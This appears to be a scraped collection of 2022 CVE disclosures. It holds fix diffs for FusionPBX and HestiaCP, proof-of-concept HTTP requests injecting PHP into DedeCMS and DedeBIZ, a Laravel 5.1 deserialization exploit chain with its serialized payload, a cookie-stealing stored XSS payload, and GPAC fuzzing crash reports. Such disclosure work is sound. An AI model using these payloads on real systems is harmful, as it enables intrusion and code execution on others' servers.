A vulnerability, which was classified as critical, was found in SourceCodester Student Management System. Affected is an unknown function of the file index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-206634 is the identifier assigned to this vulnerability.

CVE-2022-2876

FusionPBX 5.0.1 was discovered to contain a command injection vulnerability via /fax/fax_send.php.

@@ -312,7 +312,7 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ if ($fax\_file\_extension != "pdf" && $fax\_file\_extension != "tif") { chdir($dir\_fax\_temp); $command = $IS\_WINDOWS ? '' : 'export HOME=/tmp && '; $command .= 'libreoffice --headless --convert-to pdf --outdir '.$dir\_fax\_temp.' '.$dir\_fax\_temp.'/'.$fax\_name.'.'.$fax\_file\_extension; $command .= 'libreoffice --headless --convert-to pdf --outdir '.$dir\_fax\_temp.' '.$dir\_fax\_temp.'/'.escapeshellarg($fax\_name).'.'.escapeshellarg($fax\_file\_extension); exec($command); @unlink($dir\_fax\_temp.'/'.$fax\_name.'.'.$fax\_file\_extension); } @@ -322,7 +322,7 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ chdir($dir\_fax\_temp);  
//convert pdf to tif $cmd = exec('which gs')." -q -r".$gs\_r." -g".$gs\_g." -dBATCH -dPDFFitPage -dNOSAFER -dNOPAUSE -dBATCH -sOutputFile=".correct\_path($fax\_name).".tif -sDEVICE=tiffg4 -Ilib stocht.ps -c \\"{ .75 gt { 1 } { 0 } ifelse} settransfer\\" -- ".correct\_path($fax\_name).".pdf -c quit"; $cmd = exec('which gs')." -q -r".$gs\_r." -g".$gs\_g." -dBATCH -dPDFFitPage -dNOSAFER -dNOPAUSE -dBATCH -sOutputFile=".escapeshellarg($fax\_name).".tif -sDEVICE=tiffg4 -Ilib stocht.ps -c \\"{ .75 gt { 1 } { 0 } ifelse} settransfer\\" -- ".escapeshellarg($fax\_name).".pdf -c quit"; // echo($cmd . "<br/>\\n"); exec($cmd); @unlink($dir\_fax\_temp.'/'.$fax\_name.'.pdf'); @@ -672,17 +672,17 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){  
//send the fax $fax\_file = $dir\_fax\_sent."/".$fax\_instance\_uuid.".tif"; $common\_variables .= "fax\_queue\_uuid='" . $fax\_queue\_uuid . "',"; $common\_variables .= "fax\_queue\_uuid='" . escapeshellarg($fax\_queue\_uuid) . "',"; $common\_variables = "for\_fax=1,"; $common\_variables .= "accountcode='" . $fax\_accountcode . "',"; $common\_variables .= "sip\_h\_X-accountcode='" . $fax\_accountcode . "',"; $common\_variables .= "domain\_uuid=" . $\_SESSION\["domain\_uuid"\] . ","; $common\_variables .= "domain\_name=" . $\_SESSION\["domain\_name"\] . ","; $common\_variables .= "origination\_caller\_id\_name='" . $fax\_caller\_id\_name . "',"; $common\_variables .= "origination\_caller\_id\_number='" . $fax\_caller\_id\_number . "',"; $common\_variables .= "fax\_ident='" . $fax\_caller\_id\_number . "',"; $common\_variables .= "fax\_header='" . $fax\_caller\_id\_name . "',"; $common\_variables .= "fax\_file='" . $fax\_file . "',"; $common\_variables .= "accountcode='" . escapeshellarg($fax\_accountcode) . "',"; $common\_variables .= "sip\_h\_X-accountcode='" . escapeshellarg($fax\_accountcode) . "',"; $common\_variables .= "domain\_uuid=" . escapeshellarg($\_SESSION\["domain\_uuid"\]) . ","; $common\_variables .= "domain\_name=" . escapeshellarg($\_SESSION\["domain\_name"\]) . ","; $common\_variables .= "origination\_caller\_id\_name='" . escapeshellarg($fax\_caller\_id\_name) . "',"; $common\_variables .= "origination\_caller\_id\_number='" . escapeshellarg($fax\_caller\_id\_number) . "',"; $common\_variables .= "fax\_ident='" . escapeshellarg($fax\_caller\_id\_number) . "',"; $common\_variables .= "fax\_header='" . escapeshellarg($fax\_caller\_id\_name) . "',"; $common\_variables .= "fax\_file='" . escapeshellarg($fax\_file) . "',";  
foreach ($fax\_numbers as $fax\_number) {  
@@ -704,16 +704,16 @@ function fax\_split\_dtmf(&$fax\_number, &$fax\_dtmf){ $fax\_uri = $route\_array\[0\]; $fax\_variables = ""; foreach($\_SESSION\['fax'\]\['variable'\] as $variable) { $fax\_variables .= $variable.","; $fax\_variables .= escapeshellarg($variable).","; } }  
//build the fax dial string $dial\_string = $common\_variables; $dial\_string .= $fax\_variables; $dial\_string .= "mailto\_address='" . $mail\_to\_address . "',"; $dial\_string .= "mailfrom\_address='" . $mail\_from\_address . "',"; $dial\_string .= "fax\_uri=" . $fax\_uri . ","; $dial\_string .= "mailto\_address='" . escapeshellarg($mail\_to\_address) . "',"; $dial\_string .= "mailfrom\_address='" . escapeshellarg($mail\_from\_address) . "',"; $dial\_string .= "fax\_uri=" . escapeshellarg($fax\_uri) . ","; $dial\_string .= "fax\_retry\_attempts=1" . ","; $dial\_string .= "fax\_retry\_limit=20" . ","; $dial\_string .= "fax\_retry\_sleep=180" . ",";

CVE-2022-35153: Security use escapeshellarg · fusionpbx/fusionpbx@de22a91

An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.

Permalink

Browse files

Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont…

…rolled-package' into main

*   Loading branch information

Kristan Kenney committed

Mar 30, 2021

2 parents 32ef8a2 + 9a1fccd commit 27556a9a43aeaf308b33be224c2e70f2011574e6

Showing **2 changed files** with **7 additions** and **0 deletions**.

*   *   v-update-sys-hestia
*   *   main.sh

@@ -32,6 +32,7 @@ source $HESTIA/conf/hestia.conf

  

# Checking arg number

check\_args '1' "$#" 'PACKAGE'

is\_hestia\_package "hestia,hestia-nginx,hestia-php" "$package"

  

# Perform verification if read-only mode is enabled

check\_hestia\_demo\_mode

@@ -1154,6 +1154,12 @@ multiphp\_default\_version() {

echo "$sys\_phpversion"

}

  

is\_hestia\_package(){

if \[ \-z "$(echo $1 | grep -w $2)" \]; then

check\_result $E\_INVALID "$2 package is not controlled by hestiacp"

fi

}

  

# Run arbitrary cli commands with dropped privileges

# Note: setpriv --init-groups is not available on debian9 (util-linux 2.29.2)

# Input:

**0 comments on commit 27556a9**

Please sign in to comment.

CVE-2021-30070: Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont… · hestiacp/hestiacp@27556a9

DedeCMS v5.7.94 - v5.7.97 was discovered to contain a remote code execution vulnerability in member_toadmin.php.

**Dedecms has remote code execution**

*   Affected product: Dedecms V5.7.94 - V5.7.97
*   Attack type: Remote
*   Affected component: /dede/member\_toadmin.php
*   Description: DedeCMS v5.7.94 was discovered to contain a remote code execution vulnerability in member\_toadmin.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix information: Not available

    GET /dede/member_toadmin.php?id=%27.phpinfo();?%3E&typeids=1&dopost=toadmin&safecode=3373702420f2a357b12e6bc4&randcode=13967 HTTP/1.1
    Host: www.dedecms5794.com
    Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=lteb30kl960vhad3q6k4psjok4; _csrf_name_96c0ebe6=f97c33dd6471fdad17230e95a4bb1629; _csrf_name_96c0ebe61BH21ANI1AGD297L1FF21LN02BGE1DNG=c93476e2cd70eacb
    Connection: close
    

**Details**

DedeCMS v5.7.94 added the periodic password change reminder function to the file /dede/member_toadmin.php to comply with relevant web security regulations.

    // Regular password change reminders
    $arr\_password = array();
    $filename = DEDEDATA . '/password.data.php';
    if (file\_exists($filename)) {
        require\_once(DEDEDATA . '/password.data.php');
        $arr\_password = json\_decode($str\_password, true);
    }

    $timestamp = time();
    $arr\_password\[$id\] = "{$timestamp}";
    $content = "<?php\\r\\n\\$str\_password='" . json\_encode($arr\_password) . "';";

    $fp = fopen($filename, 'w') or die("写入文件 $filename 失败，请检查权限！");
    fwrite($fp, $content);
    fclose($fp);

When the input id is ', the variable $id is assigned the value \' by function _RunMagicQuotes in the file /include/common.inc.php.

    function \_RunMagicQuotes(&$svar) {
        if (!get\_magic\_quotes\_gpc()) {
            if (is\_array($svar)) {
                foreach ($svar as $\_k => $\_v) $svar\[$\_k\] = \_RunMagicQuotes($\_v);
            } else {
                if (strlen($svar) > 0 && preg\_match('#^(cfg\_|GLOBALS|\_GET|\_POST|\_COOKIE|\_SESSION)#', $svar)) {
                    exit('Request var not allow!');
                }
                $svar = addslashes($svar);
            }
        }
        return $svar;
    }

    foreach (array('\_GET', '\_POST', '\_COOKIE') as $\_request) {
        foreach ($$\_request as $\_k => $\_v) {
            if ($\_k == 'nvarname') ${$\_k} = $\_v;
            else ${$\_k} = \_RunMagicQuotes($\_v);
        }
    }

When $arr_password with $id is written to the file /data/password.data.php, function json_encode encodes $id from \' to \\', which causes escaping single quote.

Therefore, the attacker only needs to input id with '. followed by the codes he wishes to execute and configure the parameters (typeids, dopost, safecode and randcode) to write codes to the file /data/password.data.php and cause remote code execution.

CVE-2022-36216: Vulnerability/member_toadmin.poc.md at main · whitehatl/Vulnerability

DedeCMS v5.7.93 - v5.7.96 was discovered to contain a remote code execution vulnerability in login.php.

Permalink

**Dedecms has remote code execution**

*   Affected product: Dedecms V5.7.93 - V5.7.96
*   Attack type: Remote
*   Affected component: /dede/login.php
*   Description: DedeCMS v5.7.93 was discovered to contain a remote code execution vulnerability in login.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix information: V5.7.97 UTF-8正式版20220708安全及功能更新补丁

    POST /dede/login.php HTTP/1.1
    Host: dedecms5793
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=e9ag7oevkh77gnko3cdmt7mbc2
    
    dopost=login&userid=%5C%27.phpinfo%28%29%3B%3F%3E&pwd=123&validate=hw0k
    

**Details**

DedeCMS v5.7.93 added the login failure lock function to file /dede/login.php to comply with relevant web security regulations. When a user fails to login, the failure message will be written to file /data/login.data.php to record the number of failed login attempts for that user.

    $arr\_login\[$userid\] = "{$count},{$timestamp}";
    $content = "<?php\\r\\n\\$str\_login='" . json\_encode($arr\_login) . "';";

    $fp = fopen($filename, 'w') or die("写入文件 $filename 失败，请检查权限！");
    fwrite($fp, $content);
    fclose($fp);
                

The file write operation does not filter the write content sufficiently, allowing an attacker to write malicious code to the file by user name and cause remote code execution.

CVE-2022-35516: Vulnerability/Login.poc.md at main · whitehatl/Vulnerability

DedeBIZ v6 was discovered to contain a remote code execution vulnerability in sys_info.php.

Permalink

Cannot retrieve contributors at this time

**Dedebiz has remote code execution**

*   Affected product: DedeBIZ V6
*   Attack type: Remote
*   Affected component: /admin/sys\_info.php
*   Description: DedeBIZ v6.\* was discovered to contain a remote code execution vulnerability in sys\_info.php.
*   Vendor confirmed or acknowledged: Confirmed
*   Fix Information: Not available

    GET /admin/sys_info.php?dopost=add&nvarname=test&nvarvalue=phpinfo()&vartype=number HTTP/1.1
    Host: www.dedebiz6.com
    Cookie:  PHPSESSID=bs4vp003uqilf3pj1al024egs2; DedeUserID=1; DedeUserID__ckMd5=6d2e834b19e2030a; DedeLoginTime=1657701678; DedeLoginTime__ckMd5=34d8cf865664d363
    Connection: close
    

**Details**

DedeBIZ v6.\* backend admin/sys\_info.php has the function of adding variables, but the filtering of variables of type 'number' is not strict when writing to the database and php files, resulting in remote code execution.

while ($row = $dsql\->GetArray()) {
    if ($row\['type'\] == 'number') {
        if ($row\['value'\] == '') $row\['value'\] = 0;
        fwrite($fp, "\\${$row\['varname'\]} = ".$row\['value'\].";\\r\\n");
    } else {
        ...
    }
}
                

**Suggestions for fixing**

For variables with vartype as 'number', check if it is a number or force it to be a number before writing to database and php files.

CVE-2022-36215: Vulnerability/sys_info.poc.md at main · whitehatl/Vulnerability

A vulnerability was found in laravel 5.1 and classified as problematic. This issue affects some unknown processing. The manipulation leads to deserialization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-206501 was assigned to this vulnerability.

**Laravel 5.1 POP Chain**

composer create-project --prefer-dist laravel/laravel laravel5.1 "5.1.*"  
app/Http/Controllers/UsersController.php adding a controller UsersController

<?php
namespace App\\Http\\Controllers;
use Illuminate\\Http\\Request;
class UsersController extends Controller
{

    /\*\*
     \* 创建一个新用户。
     \*
     \* @param  Request  $request
     \* @return Response
     \*/
    public function store(Request $request)
    {  
        echo "Please post cmd to unserialize";

        $payload\=$request\->input("cmd");

        unserialize($payload);
        //
    }
}
?>

routes/web.php  
Route==post('/test',[\App\Http\Controllers\UsersController==class,'store']);

<?php
use Illuminate\\Support\\Facades\\Route;
/\*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
\*/

Route\==post('/test',\[\\App\\Http\\Controllers\\UsersController\==class,'store'\]);

**EXP**

<?php

namespace Illuminate\\Auth;
class RequestGuard{
	protected $provider;
	protected $callback;
	protected $request;
	public function \_\_construct(){
		$this\->callback = 'call\_user\_func';
		$this\->request = 'system';
		$this\->provider = 'calc';
	}
}

namespace Illuminate\\View;
use Illuminate\\Auth\\RequestGuard;
class InvokableComponentVariable{
	protected $callable\=\[\];
	public function \_\_construct(){
		$this\->callable\=\[new RequestGuard,'user'\];
	}
}
namespace SebastianBergmann\\RecursionContext;
use Illuminate\\View\\InvokableComponentVariable;
final class Context{
	private $arrays = \[\];
	public function \_\_construct(){
		$this\->arrays\=new InvokableComponentVariable;
	}
}
echo urlencode(serialize(new Context));
?>

O%3A42%3A%22SebastianBergmann%5CRecursionContext%5CContext%22%3A1%3A%7Bs%3A50%3A%22%00SebastianBergmann%5CRecursionContext%5CContext%00arrays%22%3BO%3A42%3A%22Illuminate%5CView%5CInvokableComponentVariable%22%3A1%3A%7Bs%3A11%3A%22%00%2A%00callable%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A28%3A%22Illuminate%5CAuth%5CRequestGuard%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00provider%22%3Bs%3A8%3A%22calc.exe%22%3Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A14%3A%22call_user_func%22%3Bs%3A10%3A%22%00%2A%00request%22%3Bs%3A6%3A%22system%22%3B%7Di%3A1%3Bs%3A4%3A%22user%22%3B%7D%7D%7D

CVE-2022-2870: Laravel5.1 Unserialize RCE · Issue #2 · beicheng-maker/vulns

Clinic's Patient Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via update_medicine_details.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Packing text box under the Update Medical Details module.

Permalink

Cannot retrieve contributors at this time

**Clinic's Patient Management System v1.0 by oretnom23 has xss vulnerability**

Author：hangZhaoYue

The password for the backend login account is: admin/admin123

Vulnerability details: There is a stored xss vulnerability in "update\_medicine\_details.php" of the Medicine Detaits module of the Medicines module in the background management system

vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code

Vulnerability File: pms/update\_medicine\_details.php

Vulnerability location: ip/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=,packing

\[+\] Payload: ip/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=<script>alert(/document.cookie/)</script> // Leak place ---> packing

POST /pms/update\_medicine\_details.php?medicine\_id\=1&medicine\_detail\_id\=1&packing\=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/pms/update\_medicine\_details.php?medicine\_id=1&medicine\_detail\_id=1&packing=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Cookie: \_ga=GA1.1.1382961971.1655097107; PHPSESSID=0e9b9jpdjupmvl1dk6lq6dnmfe
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
hidden\_id=1&medicine=1&packing=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=

1.  After we log in to the background, click on Medicines, then click on Medicines Details

2.  Pull to the bottom to see the editing function, click the edit on the first line

3.  Fill in our payload in the packing box (<script>alert(document.cookie)</script>),Click update to save

4.After clicking save, you can see that our payload is executed, and the cookie pops up

5.And also execute our payload when we access the Medicine Detaits of the Medicines module

CVE-2022-35117: bug_report/xss-1.md at main · zhangzhaoyuela/bug_report

A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/  
**Description**  
A heap-buffer-overflow has occurred in function gf\_isom\_dovi\_config\_get of isomedia/avc\_ext.c:2490 when running program MP4Box,this can reproduce on the lattest commit.

**version info**

    fuzz@ubuntu:~/gpac2.1/gpac/bin/gcc$ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    
    

**crash command**

 ./MP4Box -info poc1

**crash output**

    [iso file] Unknown box type 00000200 in parent stsd
    # Movie Info - 1 track - TimeScale 1000
    Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879)
    Fragmented: no
    Major Brand mp4@ - version 0 - compatible brands: mp42 mp41 isom iso2
    Created: GMT Thu Apr 26 09:02:13 2012
    
    
    # Track 1 Info - ID 1 - TimeScale 3000
    Media Duration 00:00:10.000  (recomputed 4 Days, 14:43:47.879)
    Track flags: Enabled In Movie In Preview
    Media Info: Language "Undetermined (und)" - Type "vide:00000200" - 300 samples
    Visual Sample Entry Info: width=320 height=240 (depth=24 bits)
    Visual Track layout: x=0 y=0 width=320 height=240
    =================================================================
    ==2235126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000130 at pc 0x7ff2a69b3bc0 bp 0x7fff43da89f0 sp 0x7fff43da89e0
    READ of size 8 at 0x60f000000130 thread T0
        #0 0x7ff2a69b3bbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490
        #1 0x56165102107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862
        #2 0x56165102ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994
        #3 0x561651002ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367
        #4 0x7ff2a4071082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x561650fd7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd)
    
    Address 0x60f000000130 is a wild pointer.
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get
    Shadow bytes around the buggy address:
      0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
    =>0x0c1e7fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2235126==ABORTING
    

**source code**

    2481 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex)
    2482 {
    2483 	GF_TrackBox* trak;
    2484 	GF_MPEGVisualSampleEntryBox *entry;
    2485 	trak = gf_isom_get_track_from_file(the_file, trackNumber);
    2486 	if (!trak || !trak->Media || !DescriptionIndex) return NULL;
    2487 	entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1);
    2488	if (!entry) return NULL;
    2489 	if (entry->internal_type != GF_ISOM_SAMPLE_ENTRY_VIDEO) return NULL;
    2490 	if (!entry->dovi_config) return NULL;          /**here**/
    2491 	return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig);
    2492 }
    
    

**sample poc:**

poc1.zip

ps: it is similar with the issue which occured in older gpac version ( #1846) . The bug was not patched . It still occured in the newest version.

CVE-2022-36191: heap-buffer-overflow in function gf_isom_dovi_config_get  · Issue #2218 · gpac/gpac

A Null Pointer dereference vulnerability exists in GPAC 2.1-DEV-revUNKNOWN-master via the function gf_filter_pid_set_property_full () at filter_core/filter_pid.c:5250,which causes a Denial of Service (DoS). This vulnerability was fixed in commit b43f9d1.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description:**  
\`A crash happened on MP4Box(GPAC version 2.1-DEV-revUNKNOWN-master) due to a null pointer dereference vulnerability in gf\_filter\_pid\_set\_property\_full function (filter\_core/filter\_pid.c:5250) .

\`  
**MP4Box version**

    ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**poc**  
poc.zip

**command**  
./MP4Box -info poc

**crash output**

    [AVC|H264] Warning: Error parsing NAL unit
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    

**gdb output**

    pwndbg> r
    Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    [AVC|H264] Warning: Error parsing NAL unit
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    [Inferior 1 (process 2239153) exited with code 01]
    pwndbg> b filter_pid.c:5250
    Breakpoint 1 at 0x7ffff4b829f6: filter_pid.c:5250. (6 locations)
    pwndbg> r
    Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301
    5301		return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     RAX  0x0
     RBX  0x7ffffffe8f50 ◂— 0x41b58ab3
     RCX  0xfffffffd22a ◂— 0x0
     RDX  0x7ffffffe9150 ◂— 0x2
     RDI  0x613000000040 ◂— 0x613000000040 /* '@' */
     RSI  0x504d5354
     R8   0x0
     R9   0x7ffff58cb4f0 (global_log_tools+496) ◂— 0x2
     R10  0x7ffff24ab3f1 ◂— 'gf_filter_pid_set_property'
     R11  0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 
     R12  0x613000000040 ◂— 0x613000000040 /* '@' */
     R13  0x7ffffffe9150 ◂— 0x2
     R14  0x504d5354
     R15  0xfffffffd1ea ◂— 0x0
     RBP  0x7ffffffe9060 —▸ 0x7ffffffe9380 —▸ 0x7ffffffea0d0 —▸ 0x7ffffffea170 —▸ 0x7ffffffea280 ◂— ...
     RSP  0x7ffffffe8f30 ◂— 0x0
     RIP  0x7ffff4b841c6 (gf_filter_pid_set_property+182) ◂— test   r12, r12
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     ► 0x7ffff4b841c6 <gf_filter_pid_set_property+182>    test   r12, r12
       0x7ffff4b841c9 <gf_filter_pid_set_property+185>    je     gf_filter_pid_set_property+1477                <gf_filter_pid_set_property+1477>
     
       0x7ffff4b841cf <gf_filter_pid_set_property+191>    test   r12b, 7
       0x7ffff4b841d3 <gf_filter_pid_set_property+195>    jne    gf_filter_pid_set_property+1477                <gf_filter_pid_set_property+1477>
     
       0x7ffff4b841d9 <gf_filter_pid_set_property+201>    mov    rax, r12
       0x7ffff4b841dc <gf_filter_pid_set_property+204>    shr    rax, 3
       0x7ffff4b841e0 <gf_filter_pid_set_property+208>    cmp    byte ptr [rax + 0x7fff8000], 0
       0x7ffff4b841e7 <gf_filter_pid_set_property+215>    jne    gf_filter_pid_set_property+1447                <gf_filter_pid_set_property+1447>
     
       0x7ffff4b841ed <gf_filter_pid_set_property+221>    cmp    r12, qword ptr [r12]
       0x7ffff4b841f1 <gf_filter_pid_set_property+225>    jne    gf_filter_pid_set_property+1016                <gf_filter_pid_set_property+1016>
     
       0x7ffff4b841f7 <gf_filter_pid_set_property+231>    mov    esi, r14d
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    In file: /home/fuzz/gpac2.1/gpac/src/filter_core/filter_pid.c
       5296 
       5297 GF_EXPORT
       5298 GF_Err gf_filter_pid_set_property(GF_FilterPid *pid, u32 prop_4cc, const GF_PropertyValue *value)
       5299 {
       5300 	if (!prop_4cc) return GF_BAD_PARAM;
     ► 5301 	return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
       5302 }
       5303 
       5304 GF_EXPORT
       5305 GF_Err gf_filter_pid_set_property_str(GF_FilterPid *pid, const char *name, const GF_PropertyValue *value)
       5306 {
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
    00:0000│ rsp 0x7ffffffe8f30 ◂— 0x0
    01:0008│     0x7ffffffe8f38 ◂— 0x0
    02:0010│     0x7ffffffe8f40 —▸ 0x7ffffffe9030 —▸ 0x7ffff54af2c0 ◂— 0x6372636170672e /* '.gpacrc' */
    03:0018│     0x7ffffffe8f48 —▸ 0x7ffffffe8f50 ◂— 0x41b58ab3
    04:0020│ rbx 0x7ffffffe8f50 ◂— 0x41b58ab3
    05:0028│     0x7ffffffe8f58 —▸ 0x7ffff5640eff ◂— '1 48 100 11 szName:5290'
    06:0030│     0x7ffffffe8f60 —▸ 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 
    07:0038│     0x7ffffffe8f68 —▸ 0x618000000c80 —▸ 0x7ffff6de03e0 (FileInRegister) —▸ 0x7ffff56a6580 ◂— 0x6e6966 /* 'fin' */
